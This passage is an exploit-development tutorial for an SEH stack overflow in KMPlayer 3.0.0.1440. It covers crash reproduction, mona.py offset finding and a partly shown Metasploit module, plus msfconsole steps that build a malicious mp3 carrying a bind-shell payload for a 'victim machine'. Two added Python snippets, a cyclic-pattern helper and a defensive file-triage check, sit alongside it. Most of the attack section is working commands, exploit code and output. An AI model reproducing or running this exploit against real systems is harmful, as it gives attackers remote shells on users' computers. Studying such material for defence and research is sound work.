The above code will create an MP3 file named “kmp_crash.mp3” whose content is the header followed by 5000 “A”s.

Run KMPlayer, attach it to Immunity Debugger and open the malicious mp3 file in KMPlayer.

KMPlayer crashes with EIP overwritten with 41414141. This is what the exploits mentioned above already use. Let’s check the SEH chain: go to "View" and select "SEH".

The SEH handlers are also overwritten with 41414141, which is user-supplied input. An attacker can execute malicious code by pointing this SEH handler at an address of his/her choice where the malicious code (shellcode) is placed in memory.

2. Fun with !mona

As we have identified the SEH overflow, let’s use mona.py to craft an exploit for it.

Run KMPlayer and attach it to Immunity Debugger. Immunity Debugger pauses the process; use this time to run PyCommands with mona.py. The output of the commands can be seen in the “Log” window.

Specify the working folder with !mona config -set workingfolder C:\logs\%p and verify it with !mona config -get workingfolder

With this, all files created by !mona commands will be stored in that directory.

Now create a pattern of 5000 characters to replace the 5000 “A”s in our mp3 file. This is a cyclic pattern of characters that makes it possible to identify the exact offsets at which EIP, SEH or any other register is overwritten. This is very helpful while developing an exploit.

Run the !mona pc 5000 command in Immunity Debugger.

This will create a file named “pattern.txt”.

Copy the pattern, replace the junk content with it and regenerate the mp3 file.

Now resume KMPlayer from Immunity Debugger, as it is still ‘paused’, and open the newly created mp3 file in KMPlayer.

KMPlayer crashes as expected. Now run the !mona suggest command.

This command analyzes the cyclic pattern to calculate the offsets to the various registers and SEH handlers, and produces the payload layout to include in a Metasploit module. It creates a file ‘exploit.rb’ containing all of the mentioned details.

Mona has given exploit payload layouts for both direct RET and SEH overflows. Now let’s craft a Metasploit module to exploit SEH.
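To make clear what !mona pc and !mona suggest compute, here is an added example (written for this page, not code from mona.py or from the original post) that generates the same kind of cyclic pattern and maps a crash value back to its offset. The pattern format (uppercase letter, lowercase letter, digit, cycled) is the one used by Metasploit's pattern_create and by mona; the 0x41336141 crash value in the test is a constructed sample.

```python
# Added example: cyclic-pattern generation and offset lookup, the mechanism
# behind "!mona pc <n>" and "!mona suggest". Not code from mona.py.
import string
import struct


def cyclic_pattern(length: int) -> bytes:
    """Build the Aa0Aa1Aa2... pattern of the requested length.

    Every 4-byte window in the first 20280 bytes is unique, which is what
    lets a debugger value (EIP, SEH handler, a register) be turned into an
    exact offset into the junk buffer.
    """
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern space exhausted (max 20280 bytes)")


def pattern_offset(pattern: bytes, value) -> int:
    """Offset of a crash value inside the pattern.

    `value` is either the raw bytes seen in memory or the dword shown by the
    debugger (e.g. 0x41336141 in EIP or in the SEH chain); an int is
    converted from little-endian, exactly as it sits on the x86 stack.
    """
    needle = struct.pack("<I", value) if isinstance(value, int) else bytes(value)
    off = pattern.find(needle)
    if off < 0:
        raise ValueError("value not found in pattern; not a pattern overwrite")
    return off


def crash_value_at(pattern: bytes, offset: int) -> int:
    """Reverse check: the dword a debugger would display if the 4 bytes at
    `offset` were loaded as a little-endian register or handler address."""
    return struct.unpack("<I", pattern[offset:offset + 4])[0]


if __name__ == "__main__":
    p = cyclic_pattern(5000)                 # same size as "!mona pc 5000"
    print(pattern_offset(p, 0x41336141))     # constructed sample value -> 9
    v = crash_value_at(p, 3314)              # the SEH offset mona reported
    print(hex(v), pattern_offset(p, v))      # round-trips back to 3314
```

The round trip in the usage lines is the check worth keeping in mind when reading a mona report: the offset it prints is only meaningful if the 4 bytes found in the handler slot occur exactly once in the pattern, which holds for any offset below 20280.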

3. Crafting metasploit module

The output of !mona suggest contains the following for the SEH exploit:

Metasploit 'include' section :
-----------------------------
    #Don't forget to include the SEH mixin !
    include Msf::Exploit::Seh

Metasploit 'Targets' section :
------------------------------
    'Targets' =>
      [
        [ '<fill in the OS/app version here>',
          {
            'Ret'    => 0x1101dd36,
            'Offset' => 3314
          }
        ],  # pop esi # pop ebx # ret 10 - bass.dll
      ],

Metasploit 'exploit' section :
-----------------------------
    def exploit
      buffer = rand_text(target['Offset'])   # junk
      buffer << generate_seh_record(target.ret)
      buffer << make_nops(30)
      buffer << payload.encoded              # 1652 bytes of space
    end

Based on the above suggestion, I have crafted the following Metasploit module for KMPlayer SEH exploitation.

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      include Msf::Exploit::FILEFORMAT
      include Msf::Exploit::Seh

      def initialize(info = {})
        super(update_info(info,
          'Name'        => 'The KMPlayer 3.0.0.1440 .mp3 SEH exploit module',
          'Description' => %q{
            This module exploits a stack buffer overflow in The KMPlayer 3.0.0.1440. When opening a specially crafted MP3 file (.mp3) in the application, the SEH handler will be overwritten.

Copy this file into the ‘exploits’ section of Metasploit to include it in the framework. On BackTrack 5, the path is /pentest/exploits/framework3/modules/exploits/windows/fileformat/

Start Metasploit with the msfconsole command, use this exploit, set the payload to windows/shell_bind_tcp and run the exploit command. This creates the malicious mp3 file, which exploits the SEH overflow once opened in KMPlayer and then listens on the port specified in the payload.

root@bt:~# msfconsole


       =[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 708 exploits - 359 auxiliary - 57 post
+ -- --=[ 224 payloads - 27 encoders - 8 nops
       =[ svn r13044 updated today (2011.06.28)

msf > use exploit/windows/fileformat/km_player_mp3_seh
msf exploit(km_player_mp3_seh) > show options

Module options (exploit/windows/fileformat/km_player_mp3_seh):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.mp3          yes       mp3 file

Exploit target:

   Id  Name
   --  ----
   0   Windows XP SP3 English VMware

msf exploit(km_player_mp3_seh) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf exploit(km_player_mp3_seh) > show options

Module options (exploit/windows/fileformat/km_player_mp3_seh):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.mp3          yes       mp3 file

Payload options (windows/shell_bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LPORT     4444             yes       The listen port
   RHOST                      no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Windows XP SP3 English VMware

msf exploit(km_player_mp3_seh) > exploit

[*] Creating 'msf.mp3' file ...
[*] Writing payload to file
[*] Generated output file /root/.msf3/data/exploits/msf.mp3
msf exploit(km_player_mp3_seh) >

The file ‘msf.mp3’ is created at /root/.msf3/data/exploits/msf.mp3. Copy this file to the victim machine and open it in KMPlayer. The application does not crash, but the SEH overflow has been exploited and the victim machine now listens on port 4444; connecting to that port spawns a shell.
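From the defender's side, the crash-trigger files this page builds have a very recognisable shape: a short header followed by thousands of copies of one byte, or by a mona/Metasploit cyclic pattern. The following added triage check (written for this page, not code from the original post or from any tool it mentions) flags both fillers in a file handed to a media player. The ID3-like header bytes and the sample files are constructed placeholders, not real MP3 content; the run-length threshold is an assumption. Note that the final module above fills the junk with rand_text, so this check catches the probe files, not the randomized output; for those a structural parse of the container is needed.

```python
# Added example: triage of a suspicious media file for the two filler types
# this page describes (long single-byte run, cyclic pattern). Not code from
# the original post.
import re
from dataclasses import dataclass
from typing import List, Tuple

MIN_RUN = 1024          # assumption: no legitimate frame data repeats one byte this long
CYCLIC_RE = re.compile(rb"(?:[A-Z][a-z][0-9]){8,}")   # 24+ bytes of Aa0Aa1Aa2...


@dataclass
class Finding:
    kind: str       # "byte_run_0x41" or "cyclic_pattern"
    offset: int     # where in the file the filler starts
    length: int     # how many bytes it spans


def longest_run(data: bytes) -> Tuple[int, int, int]:
    """Return (byte_value, offset, length) of the longest run of one repeated byte."""
    best = (-1, 0, 0)
    i = 0
    while i < len(data):
        j = i
        while j < len(data) and data[j] == data[i]:
            j += 1
        if j - i > best[2]:
            best = (data[i], i, j - i)
        i = j
    return best


def triage(data: bytes) -> List[Finding]:
    """Flag fillers typical of an overflow probe; an empty list means nothing found."""
    findings: List[Finding] = []
    value, off, n = longest_run(data)
    if n >= MIN_RUN:
        findings.append(Finding(f"byte_run_0x{value:02x}", off, n))
    for m in CYCLIC_RE.finditer(data):
        findings.append(Finding("cyclic_pattern", m.start(), m.end() - m.start()))
    return findings


# Constructed samples (placeholder header, not a valid MP3/ID3 structure).
HEADER = b"ID3\x03\x00\x00\x00\x00\x00\x00"
CRASH_FILE = HEADER + b"A" * 5000                      # header + 5000 "A"s, as on this page
PATTERN_FILE = HEADER + b"".join(                      # header + a 1560-byte cyclic pattern
    (u + l + d).encode()
    for u in "AB" for l in "abcdefghijklmnopqrstuvwxyz" for d in "0123456789"
)
CLEAN_FILE = HEADER + bytes(range(256)) * 20           # varied bytes, no filler


if __name__ == "__main__":
    for name, blob in (("crash", CRASH_FILE), ("pattern", PATTERN_FILE), ("clean", CLEAN_FILE)):
        print(name, triage(blob))
```

The byte-run check is what a mail gateway or sandbox can apply cheaply before a player ever touches the file; the cyclic-pattern check is mostly useful when reviewing files recovered from a crash report, since a pattern in the data is a strong sign someone was measuring an overflow rather than playing music.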